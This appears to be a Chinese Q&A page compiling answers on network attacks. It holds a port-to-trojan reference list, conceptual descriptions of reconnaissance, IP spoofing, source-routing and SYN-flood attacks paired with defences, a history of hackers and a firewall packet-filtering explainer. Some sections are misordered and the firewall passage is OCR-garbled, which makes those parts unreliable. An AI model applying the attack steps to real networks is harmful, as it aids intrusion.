求教：黑客一般都是怎么攻击各种端口？

黑客常用端口（实际上每个端口黑客都会想办法利用的）

端口：102

服务：Message transfer agent(MTA)-X.400 over TCP/IP

说明：消息传输代理。

端口：113

服务：Authentication Service

说明：这是一个许多计算机上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器，尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，将会看到许多这个端口的连接请求。记住，如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。

端口：119

服务：Network News Transfer Protocol

说明：NEWS新闻组传输协议，承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制，只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送SPAM。

端口：135

服务：Location Service

说明：Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX

111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point

mapper注册它们的位置。远端客户连接到计算机时，它们查找end-point

mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange

Server吗？什么版本？还有些DOS攻击直接针对这个端口。

端口：137

说明：SQL Named Pipes encryption over other protocols name

lookup(其他协议名称查找上的SQL命名管道加密技术)和SQL RPC encryption over other protocols name

lookup(其他协议名称查找上的SQL RPC加密技术)和Wins NetBT name service(WINS NetBT名称服务)和Wins

Proxy都用这个端口。

端口：137、138、139

服务：NETBIOS Name Service

说明：其中137、138是UDP端口，当通过网上邻居传输文件时用这个端口。而139端口：通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS

Regisrtation也用它。

端口：143

服务：Interim Mail Access Protocol v2

说明：和POP3的安全问题一样，许多IMAP服务器存在有缓冲区溢出漏洞。记住：一种LINUX蠕虫（admv0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后，这些漏洞变的很流行。这一端口还被用于IMAP2，但并不流行。

端口：161

服务：SNMP (Simple Network Management Protocol) （简单网络管理协议）

说明：SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中，通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。

端口：162

说明：SNMP Trap（SNMP陷阱）

端口：177

服务：X Display Manager Control Protocol

说明：许多入侵者通过它访问X-windows操作台，它同时需要打开6000端口。

端口：389

服务：LDAP、ILS

说明：轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。

端口：443

服务：Https

说明：网页浏览端口，能提供加密和通过安全端口传输的另一种HTTP。

端口：445

说明：Common Internet File System(CIFS)（公共Internet文件系统）

端口：456

服务：[NULL]

说明：木马HACKERS PARADISE开放此端口。

端口：464

说明：Kerberos kpasswd(v5)。另外TCP的464端口也是这个用途。

端口：500

说明：Internet Key Exchange(IKE)（Internet密钥交换）

端口：513

服务：Login,remote login

说明：是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。

端口：544

服务：[NULL]

说明：kerberos kshell

端口：548

服务：Macintosh,File Services(AFP/IP)

说明：Macintosh,文件服务。

端口：553

服务：CORBA IIOP （UDP）

说明：使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。

端口：555

服务：DSF

说明：木马PhAse1.0、Stealth Spy、IniKiller开放此端口。

端口：568

服务：Membership DPA

说明：成员资格 DPA。

端口：569

服务：Membership MSN

说明：成员资格 MSN。

端口：635

服务：mountd

说明：Linux的mountd

Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的，但是基于TCP的mountd有所增加（mountd同时运行于两个端口）。记住mountd可运行于任何端口（到底是哪个端口，需要在端口111做portmap查询），只是Linux默认端口是635，就像NFS通常运行于2049端口。

端口：636

服务：LDAP

说明：SSL（Secure Sockets layer）

端口：666

服务：Doom Id Software

说明：木马Attack FTP、Satanz Backdoor开放此端口

端口：993

服务：IMAP

说明：SSL（Secure Sockets layer）

TCP 7=Echo

TCP 20=FTP Data

TCP 21=Back Construction, Blade Runner, Doly Trojan, Fore, FTP trojan,

Invisible FTP, Larva, WebEx, WinCrash

TCP 23=Telnet, Tiny Telnet Server (= TTS)

TCP 25=SMTP, Ajan, Antigen, Email Password Sender, Happy 99, Kuang2,

ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy

TCP 31=Agent 31, Hackers Paradise, Masters Paradise

TCP 41=DeepThroat

TCP 43=WHOIS

TCP 53=DNS,Bonk (DOS Exploit)

TCP 59=DMSetup

TCP 70=Gopher

TCP 79=Firehotcker, Finger

TCP 80=Http服务器, Executor, RingZero

TCP 99=Hidden Port

TCP 110=Pop3服务器, ProMail

TCP 113=Kazimas, Auther Idnet

TCP 119=Nntp, Happy 99

TCP 121=JammerKiller, Bo jammerkillah

TCP 137=NetBios-NS

TCP 138=NetBios-DGN

TCP 139=NetBios-SSN

TCP 143=IMAP

TCP 161=Snmp

TCP 162=Snmp-Trap

TCP 194=Irc

TCP 421=TCP Wrappers

TCP 456=Hackers paradise

TCP 531=Rasmin

TCP 555=Ini-Killer, Phase Zero, Stealth Spy

TCP 666=Attack FTP, Satanz Backdoor

TCP 808=RemoteControl

TCP 911=Dark Shadow

TCP 999=DeepThroat

TCP 1001=Silencer, WebEx

TCP 1010=Doly

TCP 1011=Doly

TCP 1012=Doly

TCP 1015=Doly

TCP 1024=NetSpy.698(YAI)

TCP 1025=NetSpy.698

TCP 1033=Netspy

TCP 1042=Bla

TCP 1045=Rasmin

TCP 1047=GateCrasher

TCP 1080=Wingate

TCP 1090=Xtreme, VDOLive

TCP 1170=Psyber Stream Server, Streaming Audio trojan

TCP 1234=Ultors

TCP 1243=BackDoor-G, SubSeven, SubSeven Apocalypse

TCP 1245=VooDoo Doll

TCP 1269=Mavericks Matrix

TCP 1492=FTP99CMP(BackOriffice.FTP)

TCP 1509=Psyber Streaming Server

TCP 1600=Shivka-Burka

TCP 1807=SpySender

TCP 1981=Shockrave

TCP 1999=BackDoor, TransScout

TCP 2001=TrojanCow

TCP 2023=Ripper, Pass Ripper

TCP2115=Bugs

TCP 2140=Deep Throat, The Invasor

TCP 2155=Illusion Mailer

TCP 2283=HVL Rat5

TCP2565=Striker

TCP 2583=WinCrash

TCP 2600=Digital RootBeer

TCP2801=Phineas Phucker

TCP3024=WinCrash trojan

TCP 3128=RingZero

TCP 3129=Masters Paradise

TCP 3150=Deep Throat, The Invasor

TCP 3210=SchoolBus

TCP 3459=Eclipse 2000

TCP 3700=Portal of Doom

TCP 3791=Eclypse

TCP 4000=腾讯OICQ客户端

TCP 4092=WinCrash

TCP 4321=BoBo

TCP 4567=File Nail

TCP 4590=ICQTrojan

TCP 5000=Bubbel, Back Door Setup, Sockets de Troie

TCP 5001=Back Door Setup, Sockets de Troie

TCP 5011=One of the Last Trojans (OOTLT)

TCP 5031=Firehotcker

TCP 5190=ICQ Query

TCP 5321=Firehotcker

TCP 5400=Blade Runner, BackConstruction1.2

TCP 5401=Blade Runner

TCP 5402=Blade Runner

TCP 5550=Xtcp

TCP 5555=ServeMe

TCP 5556=BO Facil

TCP 5557=BO Facil

TCP 5569=Robo-Hack

TCP 5631=PCAnyWhere data

TCP 5714=Wincrash3

TCP 5742=WinCrash

TCP 6400=The Thing

TCP 6667=NT Remote Control

TCP 6669=Vampyre

TCP 6670=DeepThroat

TCP 6711=SubSeven

TCP 6771=DeepThroat

TCP 6776=BackDoor-G, SubSeven

TCP 6883=DeltaSource

TCP 6912=Shit Heep

TCP 6939=Indoctrination

TCP 6969=GateCrasher, Priority, IRC 3

TCP 6970=GateCrasher

TCP 7000=Remote Grab

TCP 7300=NetMonitor

TCP 7301=NetMonitor

TCP 7306=NetMonitor

TCP 7307=NetMonitor, ProcSpy

TCP 7308=NetMonitor, X Spy

TCP 7323=Sygate服务器端

TCP 7626=冰河

TCP 7789=Back Door Setup, ICKiller

TCP 8000=XDMA, 腾讯OICQ服务器端

TCP 8010=Logfile

TCP 8080=WWW 代理, Ring Zero

TCP 9400=InCommand

TCP 9401=InCommand

TCP 9402=InCommand

TCP 9872=Portal of Doom

TCP 9873=Portal of Doom

TCP 9874=Portal of Doom

TCP 9875=Portal of Doom

TCP 9876=Cyber Attacker

TCP 9878=TransScout

TCP 9989=Ini-Killer

TCP 10101=BrainSpy

TCP 10167=Portal Of Doom

TCP 10520=Acid Shivers

TCP 10607=Coma trojan

TCP 11000=Senna Spy

TCP 11223=Progenic

TCP 12076=Gjamer, MSH.104b

TCP 12223=Hack?9 KeyLogger

TCP 12345=GabanBus, NetBus, Pie Bill Gates, X-bill

TCP 12346=GabanBus, NetBus, X-bill

TCP 12361=Whack-a-mole

TCP 12362=Whack-a-mole

TCP 12631=WhackJob

TCP 13000=Senna Spy

TCP 16969=Priority

TCP 17300=Kuang2 The Virus

TCP 20000=Millennium II (GrilFriend)

TCP 20001=Millennium II (GrilFriend)

TCP 20034=NetBus 2 Pro

TCP 20203=Logged

TCP 20331=Bla

TCP 21544=Schwindler 1.82, GirlFriend

TCP 22222=Prosiak

TCP 23456=Evil FTP, Ugly FTP, WhackJob

TCP 23476=Donald Dick

TCP 23477=Donald Dick

TCP 27374=Sub Seven 2.0+

TCP 29891=The Unexplained

TCP 30029=AOL trojan

TCP 30100=NetSphere 1.27a, NetSphere 1.31

TCP 30101=NetSphere 1.31, NetSphere 1.27a

TCP 30102=NetSphere 1.27a, NetSphere 1.31

TCP 30103=NetSphere 1.31

TCP 30303=Sockets de Troie

TCP 30999=Kuang2

TCP 31336=Bo Whack

TCP 31337=Baron Night, BO client, BO2, Bo Facil, BackFire, Back Orifice,

DeepBO

TCP 31339=NetSpy DK

TCP 31666=BOWhack

TCP 31785=Hack Attack

TCP 31787=Hack Attack

TCP 31789=Hack Attack

TCP 31791=Hack Attack

TCP 33333=Prosiak

TCP 33911=Spirit 2001a

TCP 34324=BigGluck, TN

TCP 40412=The Spy

TCP 40421=Agent 40421, Masters Paradise.96

TCP 40422=Masters Paradise

TCP 40423=Masters Paradise.97

TCP 40426=Masters Paradise

TCP 47878=BirdSpy2

TCP 50505=Sockets de Troie

TCP 50766=Fore, Schwindler

TCP 53001=Remote Windows Shutdown

TCP 54320=Back Orifice 2000

TCP 54321=School Bus .69-1.11

TCP 60000=Deep Throat

TCP 61466=Telecommando

TCP 65000=Devil

UDP 1349=BO dll

UDP 2989=RAT

UDP 3801=Eclypse

UDP 10067=Portal of Doom

UDP 10167=Portal of Doom

UDP 26274=Delta Source

UDP 29891=The Unexplained

UDP 31337=Baron Night, BO client, BO2, Bo Facil, BackFire, Back Orifice,

DeepBO

UDP 31338=Back Orifice, NetSpy DK, DeepBO

UDP 31789=Hack aTack

UDP 31791=Hack aTack

UDP 47262=Delta Source

UDP 54321=Back Orifice 2000

黑客常用软件以及方法

;bs=%BA%DA%BF%CD%B3%A3%D3%C3%B6%CB%BF%DAsr=z=cl=3f=8wd=%BA%DA%BF%CD%B3%A3%D3%C3%C8%ED%BC%FEct=0

求答案!!急急急!什么是黑客？黑客攻击一般采用的过程是什么？试论述如何预防和保护免受黑客的攻击与破坏

黑客一词，源于英文Hacker，原指热心于计算机技术，水平高超的电脑专家，尤其是程序设计人员。美国大片《黑(骇)客帝国》的热映，使得黑客文化得到了广泛的传播，也许很多人会觉得黑客一词是用来形容那些专门利用电脑搞破坏或恶作剧的家伙，而对这些人的正确英文叫法是Cracker，有人翻译成“骇客”。不管是叫黑客还是骇客，他们根本的区别是:黑客们建设、维护，而骇客们入侵、破坏。

目前造成网络不安全的主要因素是系统、协议及数据库等的设计上存在缺陷。由于当今的计算机网络操作系统在本身结构设计和代码设计时偏重考虑系统使用时的方便性，导致了系统在远程访问、权限控制和口令管理等许多方面存在安全漏洞。

网络互连一般采用TCP/IP协议，它是一个工业标准的协议簇，但该协议簇在制订之初，对安全问题考虑不多，协议中有很多的安全漏洞。同样，数据库管理系统（DBMS）也存在数据的安全性、权限管理及远程访问等方面问题，在DBMS或应用程序中可以预先安置从事情报收集、受控激发、定时发作等破坏程序。

由此可见，针对系统、网络协议及数据库等，无论是其自身的设计缺陷，还是由于人为的因素产生的各种安全漏洞，都可能被一些另有图谋的黑客所利用并发起攻击。因此若要保证网络安全、可靠，则必须熟知黑客网络攻击的一般过程。只有这样方可在黒客攻击前做好必要的防备，从而确保网络运行的安全和可靠。

一、黑客攻击网络的一般过程

1、信息的收集

信息的收集并不对目标产生危害，只是为进一步的入侵提供有用信息。黑客可能会利用下列的公开协议或工具，收集驻留在网络系统中的各个主机系统的相关信息：

（1）TraceRoute程序 能够用该程序获得到达目标主机所要经过的网络数和路由器数。

（2）SNMP协议 用来查阅网络系统路由器的路由表，从而了解目标主机所在网络的拓扑结构及其内部细节。

（3）DNS服务器 该服务器提供了系统中可以访问的主机IP地址表和它们所对应的主机名。

（4）Whois协议 该协议的服务信息能提供所有有关的DNS域和相关的管理参数。

（5）Ping实用程序 可以用来确定一个指定的主机的位置或网线是否连通。

2、系统安全弱点的探测

在收集到一些准备要攻击目标的信息后，黑客们会探测目标网络上的每台主机，来寻求系统内部的安全漏洞，主要探测的方式如下：

（1）自编程序 对某些系统，互联网上已发布了其安全漏洞所在，但用户由于不懂或一时疏忽未打上网上发布的该系统的“补丁”程序，那么黒客就可以自己编写一段程序进入到该系统进行破坏。

（2）慢速扫描 由于一般扫描侦测器的实现是通过监视某个时间段里一台特定主机发起的连接的数目来决定是否在被扫描，这样黑客可以通过使用扫描速度慢一些的扫描软件进行扫描。

（3）体系结构探测 黑客利用一些特殊的数据包传送给目标主机，使其作出相对应的响应。由于每种操作系统的响应时间和方式都是不一样的，黒客利用这种特征把得到的结果与准备好的数据库中的资料相对照，从中便可轻而易举地判断出目标主机操作系统所用的版本及其他相关信息。

二、协议欺骗攻击及其防范措施

1、源IP地址欺骗攻击

许多应用程序认为若数据包可以使其自身沿着路由到达目的地，并且应答包也可回到源地，那么源IP地址一定是有效的，而这正是使源IP地址欺骗攻击成为可能的一个重要前提。

假设同一网段内有两台主机A和B，另一网段内有主机X。B 授予A某些特权。X 为获得与A相同的特权，所做欺骗攻击如下：首先，X冒充A，向主机 B发送一个带有随机序列号的SYN包。主机B响应，回送一个应答包给A，该应答号等于原序列号加1。

然而，此时主机A已被主机X利用拒绝服务攻击 “淹没”了，导致主机A服务失效。结果，主机A将B发来的包丢弃。为了完成三次握手，X还需要向B回送一个应答包，其应答号等于B向A发送数据包的序列号加1。此时主机X 并不能检测到主机B的数据包（因为不在同一网段），只有利用TCP顺序号估算法来预测应答包的顺序号并将其发送给目标机B。如果猜测正确，B则认为收到的ACK是来自内部主机A。此时，X即获得了主机A在主机B上所享有的特权，并开始对这些服务实施攻击。

要防止源IP地址欺骗行为，可以采取以下措施来尽可能地保护系统免受这类攻击：

（1）抛弃基于地址的信任策略 阻止这类攻击的一种十分容易的办法就是放弃以地址为基础的验证。不允许r类远程调用命令的使用；删除.rhosts 文件；清空/etc/hosts.equiv 文件。这将迫使所有用户使用其它远程通信手段，如telnet、ssh、skey等等。

（2）使用加密方法 在包发送到 网络上之前，我们可以对它进行加密。虽然加密过程要求适当改变目前的网络环境，但它将保证数据的完整性、真实性和保密性。

（3）进行包过滤 可以配置路由器使其能够拒绝网络外部与本网内具有相同IP地址的连接请求。而且，当包的IP地址不在本网内时，路由器不应该把本网主机的包发送出去。有一点要注意，路由器虽然可以封锁试图到达内部网络的特定类型的包。但它们也是通过分析测试源地址来实现操作的。因此，它们仅能对声称是来自于内部网络的外来包进行过滤，若你的网络存在外部可信任主机，那么路由器将无法防止别人冒充这些主机进行IP欺骗。

2、源路由欺骗攻击

在通常情况下，信息包从起点到终点所走的路是由位于此两点间的路由器决定的，数据包本身只知道去往何处，而不知道该如何去。源路由可使信息包的发送者将此数据包要经过的路径写在数据包里，使数据包循着一个对方不可预料的路径到达目的主机。下面仍以上述源IP欺骗中的例子给出这种攻击的形式：

主机A享有主机B的某些特权，主机X想冒充主机A从主机B（假设IP为aaa.bbb.ccc.ddd）获得某些服务。首先，攻击者修改距离X最近的路由器，使得到达此路由器且包含目的地址aaa.bbb.ccc.ddd的数据包以主机X所在的网络为目的地；然后，攻击者X利用IP欺骗向主机B发送源路由(指定最近的路由器)数据包。当B回送数据包时，就传送到被更改过的路由器。这就使一个入侵者可以假冒一个主机的名义通过一个特殊的路径来获得某些被保护数据。

为了防范源路由欺骗攻击，一般采用下面两种措施：

· 对付这种攻击最好的办法是配置好路由器，使它抛弃那些由外部网进来的却声称是内部主机的报文。

· 在路由器上关闭源路由。用命令no ip source-route。

三、拒绝服务攻击及预防措施

在拒绝服务攻击中，攻击者加载过多的服务将对方资源全部使用，使得没有多余资源供其他用户无法使用。SYN Flood攻击是典型的拒绝服务攻击。

SYN Flood常常是源IP地址欺骗攻击的前奏，又称半开式连接攻击，每当我们进行一次标准的TCP连接就会有一个三次握手的过程，而SYN Flood在它的实现过程中只有三次握手的前两个步骤，当服务方收到请求方的SYN并回送SYN-ACK确认报文后，请求方由于采用源地址欺骗等手段，致使服务方得不到ACK回应，这样，服务方会在一定时间内处于等待接收请求方ACK报文的状态，一台服务器可用的TCP连接是有限的，如果恶意攻击方快速连续的发送此类连接请求，则服务器的系统可用资源、网络可用带宽急剧下降，将无法向其它用户提供正常的网络服务。

为了防止拒绝服务攻击，我们可以采取以下的预防措施：

（1） 建议在该网段的路由器上做些配置的调整，这些调整包括限制Syn半开数据包的流量和个数。

（2）要防止SYN数据段攻击，我们应对系统设定相应的内核参数，使得系统强制对超时的Syn请求连接数据包复位，同时通过缩短超时常数和加长等候队列使得系统能迅速处理无效的Syn请求数据包。

（3）建议在路由器的前端做必要的TCP拦截，使得只有完成TCP三次握手过程的数据包才可进入该网段，这样可以有效地保护本网段内的服务器不受此类攻击。

（4）对于信息淹没攻击，我们应关掉可能产生无限序列的服务来防止这种攻击。比如我们可以在服务器端拒绝所有的ICMP包，或者在该网段路由器上对ICMP包进行带宽方面的限制，控制其在一定的范围内。

总之，要彻底杜绝拒绝服务攻击，最好的办法是惟有追根溯源去找到正在进行攻击的机器和攻击者。 要追踪攻击者可不是一件容易的事情，一旦其停止了攻击行为，很难将其发现。惟一可行的方法是在其进行攻击的时候，根据路由器的信息和攻击数据包的特征，采用逐级回溯的方法来查找其攻击源头。这时需要各级部门的协同配合方可有效果。

四、其他网络攻击行为的防范措施

协议攻击和拒绝服务攻击是黑客惯于使用的攻击方法，但随着网络技术的飞速发展，攻击行为千变万化，新技术层出不穷。下面将阐述一下网络嗅探及缓冲区溢出的攻击原理及防范措施。

1、针对网络嗅探的防范措施

网络嗅探就是使网络接口接收不属于本主机的数据。计算机网络通常建立在共享信道上，以太网就是这样一个共享信道的网络，其数据报头包含目的主机的硬件地址，只有硬件地址匹配的机器才会接收该数据包。一个能接收所有数据包的机器被称为杂错节点。通常账户和口令等信息都以明文的形式在以太网上传输，一旦被黑客在杂错节点上嗅探到，用户就可能会遭到损害。

对于网络嗅探攻击，我们可以采取以下措施进行防范：

（1）网络分段 一个网络段包括一组共享低层设备和线路的机器，如交换机，动态集线器和网桥等设备，可以对数据流进行限制，从而达到防止嗅探的目的。

（2）加密 一方面可以对数据流中的部分重要信息进行加密，另一方面也可只对应用层加密，然而后者将使大部分与网络和操作系统有关的敏感信息失去保护。选择何种加密方式这就取决于信息的安全级别及网络的安全程度。

（3）一次性口令技术 口令并不在网络上传输而是在两端进行字符串匹配，客户端利用从服务器上得到的Challenge和自身的口令计算出一个新字符串并将之返回给服务器。在服务器上利用比较算法进行匹配，如果匹配，连接就允许建立，所有的Challenge和字符串都只使用一次。

（4）禁用杂错节点 安装不支持杂错的网卡，通常可以防止IBM兼容机进行嗅探。

2、缓冲区溢出攻击及其防范措施

缓冲区溢出攻击是属于系统攻击的手段，通过往程序的缓冲区写超出其长度的内容，造成缓冲区的溢出，从而破坏程序的堆栈，使程序转而执行其它指令，以达到攻击的目的。当然，随便往缓冲区中填东西并不能达到攻击的目的。最常见的手段是通过制造缓冲区溢出使程序运行一个用户shell，再通过shell执行其它命令。如果该程序具有root权限的话，攻击者就可以对系统进行任意操作了。

缓冲区溢出对网络系统带来了巨大的危害，要有效地防止这种攻击，应该做到以下几点：

（1）程序指针完整性检查 在程序指针被引用之前检测它是否改变。即便一个攻击者成功地改变了程序的指针，由于系统事先检测到了指针的改变，因此这个指针将不会被使用。

（2）堆栈的保护 这是一种提供程序指针完整性检查的编译器技术，通过检查函数活动记录中的返回地址来实现。在堆栈中函数返回地址后面加了一些附加的字节，而在函数返回时，首先检查这个附加的字节是否被改动过。如果发生过缓冲区溢出的攻击，那么这种攻击很容易在函数返回前被检测到。但是，如果攻击者预见到这些附加字节的存在，并且能在溢出过程中同样地制造他们，那么他就能成功地跳过堆栈保护的检测。

（3）数组边界检查 所有的对数组的读写操作都应当被检查以确保对数组的操作在正确的范围内进行。最直接的方法是检查所有的数组操作，通常可以采用一些优化技术来减少检查次数。目前主要有这几种检查方法：Compaq C编译器、Jones Kelly C数组边界检查、Purify存储器存取检查等。

未来的竞争是信息竞争，而网络信息是竞争的重要组成部分。其实质是人与人的对抗，它具体体现在安全策略与攻击策略的交锋上。为了不断增强信息系统的安全防御能力，必须充分理解系统内核及网络协议的实现，真正做到洞察对方网络系统的“细枝末节”，同时应该熟知针对各种攻击手段的预防措施，只有这样才能尽最大可能保证网络的安全。

（4）利用公开的工具软件 像审计网络用的安全分析工具SATAN、Internet的电子安全扫描程序IIS等一些工具对整个网络或子网进行扫描，寻找安全方面的漏洞。

3、建立模拟环境，进行模拟攻击

根据前面两小点所得的信息，建立一个类似攻击对象的模拟环境，然后对此模拟目标进行一系列的攻击。在此期间，通过检查被攻击方的日志，观察检测工具对攻击的反应，可以进一步了解在攻击过程中留下的“痕迹”及被攻击方的状态，以此来制定一个较为周密的攻击策略。

4、具体实施网络攻击

入侵者根据前几步所获得的信息，同时结合自身的水平及经验总结出相应的攻击方法，在进行模拟攻击的实践后，将等待时机，以备实施真正的网络攻击。

·关于黑客

黑客（hacker），源于英语动词hack，意为“劈，砍”，引申为“干了一件非常漂亮的工作”。在早期麻省理工学院的校园俚语中，“黑客”则有“恶作剧”之意，尤指手法巧妙、技术高明的恶作剧。在日本《新黑客词典》中，对黑客的定义是“喜欢探索软件程序奥秘，并从中增长了其个瞬鸥傻娜恕?/P

他们不象绝大多数电脑使用者那样，只规规矩矩地了解别人指定了解的狭小部分知识。”由这些定义中，我们还看不出太贬义的意味。他们通常具有硬件和软件的高级知识，并有能力通过创新的方法剖析系统。“黑客”能使更多的网络趋于完善和安全，他们以保护网络为目的，而以不正当侵入为手段找出网络漏洞。

另一种入侵者是那些利用网络漏洞破坏网络的人。他们往往做一些重复的工作（如用暴力法破解口令），他们也具备广泛的电脑知识，但与黑客不同的是他们以破坏为目的。这些群体成为“骇客”。当然还有一种人兼于黑客与入侵者之间。

一般认为，黑客起源于50年代麻省理工学院的实验室中，他们精力充沛，热衷于解决难题。60、70年代，“黑客”一词极富褒义，用于指代那些独立思考、奉公守法的计算机迷，他们智力超群，对电脑全身心投入，从事黑客活动意味着对计算机的最大潜力进行智力上的自由探索，为电脑技术的发展做出了巨大贡献。正是这些黑客，倡导了一场个人计算机革命，倡导了现行的计算机开放式体系结构，打破了以往计算机技术只掌握在少数人手里的局面，开了个人计算机的先河，提出了“计算机为人民所用”的观点，他们是电脑发展史上的英雄。现在黑客使用的侵入计算机系统的基本技巧，例如破解口令（password cracking），开天窗（trapdoor），走后门（backdoor），安放特洛伊木马（Trojan horse）等，都是在这一时期发明的。从事黑客活动的经历，成为后来许多计算机业巨子简历上不可或缺的一部分。例如，苹果公司创始人之一乔布斯就是一个典型的例子。

在60年代，计算机的使用还远未普及，还没有多少存储重要信息的数据库，也谈不上黑客对数据的非法拷贝等问题。到了80、90年代，计算机越来越重要，大型数据库也越来越多，同时，信息越来越集中在少数人的手里。这样一场新时期的“圈地运动”引起了黑客们的极大反感。黑客认为，信息应共享而不应被少数人所垄断，于是将注意力转移到涉及各种机密的信息数据库上。而这时，电脑化空间已私有化，成为个人拥有的财产，社会不能再对黑客行为放任不管，而必须采取行动，利用法律等手段来进行控制。黑客活动受到了空前的打击。

但是，政府和公司的管理者现在越来越多地要求黑客传授给他们有关电脑安全的知识。许多公司和政府机构已经邀请黑客为他们检验系统的安全性，甚至还请他们设计新的保安规程。在两名黑客连续发现网景公司设计的信用卡购物程序的缺陷并向商界发出公告之后，网景修正了缺陷并宣布举办名为“网景缺陷大奖赛”的竞赛，那些发现和找到该公司产品中安全漏洞的黑客可获1000美元奖金。无疑黑客正在对电脑防护技术的发展作出贡献。

包过滤技术如何防御黑客攻击以及包过滤技术的优缺点（越详细越好）

花钱下载的文章，希望对你有帮助！

用专业术语来说，防火墙是一种位于两个或多个网络间，实施网

络之 访问控制的组件集合。对于普通用户来说，所谓 “ 防火墙”，

指的就是一种破放置在自己的计算机与外界网络之间的防御系统，从

网络发往计算机的所有数据都要经过它的判断处理后，才会决定能不

能把这些数据交给计算机，一旦发现有害数据，防火墙就会拦截下

来，实现了对汁算机的保护功能。

1 防火墙的主要功能

(1 )防火墙是网络安全的屏障。一个防火墙能极大地提高一个

内部网络的安全性，并通过过滤不安全的服务而降低风险。由于只有

经过精心选择的应用协议才能过防火墙，所以网络环境变得更安全。

如防火墙可以禁止诸如众所』 吉 I 知的不安全的NF S 协议进出受保护网

络，这样外部的攻击者就不可能利1 } f 】 这些脆弱的协议来攻击内部网

络。防火墙吲时可以保护网络免受基于路由的攻击 ，如I P 选项中的源

路由攻击和I CMP 重定向中的重定向路径。防火墙应该可以拒绝所有

以上类型攻击的报文并通知系统管理员。

( 2)防火墙可以强化网络安全策略。通过以防火墙为中心的安

全方案配置 ，能将所有安全软件 ( 如口令、加密、身份认证、审计

等)配置在防火墙上。与将网络安全问题分散到各个主机上相比，防

火墙的集中安全管理更经济。例如在网络访 时，一次一密口令系统

和其它的身份认证系统完全可以不必分散在各个主机上，而集中在防

火墙上。

( 3)对婀络存取和访问进行监控审汁。如果所有的访i ' u 】 部经过

防火墙 ，那么，防火墙就能记录下这些访问并作出E t 志汜录， 时也

能提供网络使用情况的统计数据。当发生可疑动作时，防火墙能进行

适当的报警，并提供网络是否受到监测和攻击的详细信息。另外，收

集一个网络的使用和误用情况也是非常重要的 首先的理由是可以清

楚防火墙是否能够抵挡攻击者的探测和攻击，并且清楚防火墙的控制

是否充足。而网络使用统汁对I 矧络需求分析和威胁分析等而言也是非

常重要的。

( 4)防止内部信息的外泄。通过利用防火墙对内部网络的划

分，可实现内部网重点网段的隔离 ，从而限制了局部重点或敏感网络

安全问题对全局网络造成的影响。使用防火墙就可以隐蔽那些透漏内

部细节j t l F i n g e r ，DNS 等服务。F i n g e r 显示了主机的所有用户的注册

名、真名，最后器录时间和使用s h e l l 类型等。但是F i n g e r 显示的信息

非常容易被攻击者所获悉。攻击者可以知道一个系统使用的频繁程

度，这个系统是否有用户正在连线上嘲，这个系统是否在被攻击时引

起注意等等。防火墙可以同样阻塞有关内部网络中的DNS 信息，这样

一

台主机的域名和I P 地址就不会谈外界所了解。

2 防火墙体系结构

(1 )双宿／ 多宿主机。这种模式是在堡垒主机上配置两块或两块

以上的网卡实现的。其中，一块网卡用于外部网络 ，而其余网卡则用

于内部网络，并通过代理服务系统来实现防火墙的各种功能。

( 2)屏蔽主机。这种模式是在双宿／ 多宿主机模式的基础上增加

外部过滤路由没备实现的。堡垒主机通过一个外部过滤路由器进行连

接，在通过代 服务系统将外部过滤路由器传来的消息于内部网络联

系在一起，从而起到保护内部网络的作用。

( 3)屏蔽子网。这种模式是在屏蔽主饥模式的基础上增加内部

过滤路由设备实现的。堡垒主机使用的两个过滤路由器，分别于内部

网络和外部网络连接，再通过代理服务系统处理经过过滤路d t 器的信息

3 防火墙包过滤技术

(1 ) “ 包过滤”技术简介。 “ 包过滤”是最早使用的一种防火

墙技术，也是防火墙所要实现的最基本功能，它可将不符合要求的包

过滤掉。它的第一代模型是 “ 静态包过滤”，使用包过滤技术的防火

墙通常工作在o s i 模型 中的网络层上，后来发展更新的 “ 动态包过

滤”增加了传输层 ，简言之 ，包过滤技术工作的地方就是各种基于

T C P ／ I P 协议的数据报文进出的通道 ，它把这两层作为数据监控的对

象，对每个数据包的头部、协议、地址 、端口、类型等信息进行分

析，并与预先没定好的防火墙过滤规则进行核对，一旦发现某个包的

某个或多个部分与过滤规则匹配并且条件为 “ 阻止”的时候，这个包

就会被丢弃。

( 2) “ 包过滤”防火墙的一般工作原理。包过滤是在I P 层实现

的，因此，它可以只用路由器完成。包过滤根据包的源I P J ~J L、目的

I P 地址、源端口、目的端口及包传递方向等报头信息来判断是否允许

包通过。过滤用户定义的内容，如I P 地址。其工作原理是系统在网络

层检查数据包 ，与应用层无关 ，包过滤器的应用非常广泛 ，因为

CP U用来处理包过滤的时间可以忽略不汁。而且这种防护措施对用户

透明，合法用户在进出网络时，根本感觉不到它的存在，使用起来很

方便。这样系统就具有很好的传输性能，易扩展：但是这种防火墙不

太安全，因为系统对应用层信息无感知也就是说，它们不理解通信的

内容，不能在用户级别上进行过滤 ，即不能识别不同的用户和防止

I P 地址的盗用。如果攻击者把自己主机的I P 地址没成一个合法主机的

l P 地址，就可以很轻易地通过包过滤器，这样更容易被黑客攻破。

